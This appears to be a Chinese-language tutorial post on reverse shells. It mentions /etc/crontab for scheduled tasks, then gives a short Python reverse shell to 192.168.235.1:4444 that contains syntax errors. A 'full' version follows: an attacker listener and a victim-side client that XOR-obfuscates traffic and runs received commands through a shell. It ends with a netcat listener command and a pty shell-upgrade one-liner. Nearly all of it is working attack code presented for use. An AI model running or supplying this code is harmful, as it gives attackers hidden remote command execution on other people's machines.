/etc/crontab设置定期执行的任务，修改需要root权限

 

简易版

python反弹shell的文件：

1 #!/usr/bin/python
2 import os,subprocess,socket
3 
4 s=socket.socket(socket.AF_INET,socket,SOCK_STREAM)
5 s.connect((192.168.235.1,4444))
6 os.dup2(s.fileno(),0)
7 os.dup2(s.fileno(),1)
8 os.dup2(s.fileno(),2)
9 p=subprocess.call(["/bin/sh","-i"])

攻击机使用监听命令:　　nc -vlp 4444

 

完整版

攻击机(监听端口444得到shell)执行的文件：

 1 #!/usr/bin/env python3
 2 # -*- coding:utf-8 -*-
 3 # Author:Ameng, jlx-love.com
 4 
 5 from socket import *
 6 import struct
 7 
 8 
 9 client = socket(AF_INET,SOCK_STREAM)
10 client.bind(('0.0.0.0',4444))
11 client.listen(5)
12 print('[+]Listening on port 4444...')
13 (conn,(ip,port)) = client.accept()
14 print('connect successfully to',ip)
15 
16 def encrypt(data):
17     data = bytearray(data)
18     for i in range(len(data)):
19         data[i] ^= 0x23
20     return data
21 
22 
23 def decrypt(data):
24     data = bytearray(data)
25     for i in range(len(data)):
26         data[i] ^= 0x23
27     return data
28 
29 
30 while True:
31     cmd = input('~$ ').strip()
32     if len(cmd) == 0:
33         continue
34     cmd = encrypt(cmd.encode('utf-8'))
35     conn.send(cmd)
36     header = conn.recv(4)
37     total_size = struct.unpack('i',header)[0]
38     recv_size = 0
39     while recv_size < total_size:
40         recv_data = conn.recv(1024)
41         recv_size += len(recv_data)
42         recv_data = decrypt(recv_data)
43         print(recv_data.decode('utf-8'),end='')

靶机(被拿到shell)执行的文件：

 1 #!/usr/bin/env python3
 2 # -*- coding:utf-8 -*-
 3 # Author:Ameng, jlx-love.com
 4 
 5 from socket import *
 6 import subprocess
 7 import struct
 8 
 9 
10 
11 server = socket(AF_INET,SOCK_STREAM)
12 server.connect(('192.168.235.1',4444))
13 
14 def encrypt(data):
15     data = bytearray(data)
16     for i in range(len(data)):
17         data[i] ^= 0x23
18     return data
19 
20 
21 def decrypt(data):
22     data = bytearray(data)
23     for i in range(len(data)):
24         data[i] ^= 0x23
25     return data
26 
27 
28 while True:
29     try:
30         cmd = server.recv(1024)
31         cmd = decrypt(cmd)
32         if len(cmd) == 0:
33             break
34         res = subprocess.Popen(cmd.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
35         stdout_res = res.stdout.read()
36         stderr_res = res.stderr.read()
37         result = stdout_res + stderr_res
38         result = encrypt(result)
39         total_size = len(result)
40         header = struct.pack('i',total_size)
41         server.send(header)
42         server.send(result)
43     except  Exception:
44         break
45 server.close()

 注：在靶机运行py文件时才能在攻击机执行命令，当停止运行则shell环境结束

得到shell的命令行优化指令：

python -c "import pty;pty.spawn('/bin/bash')"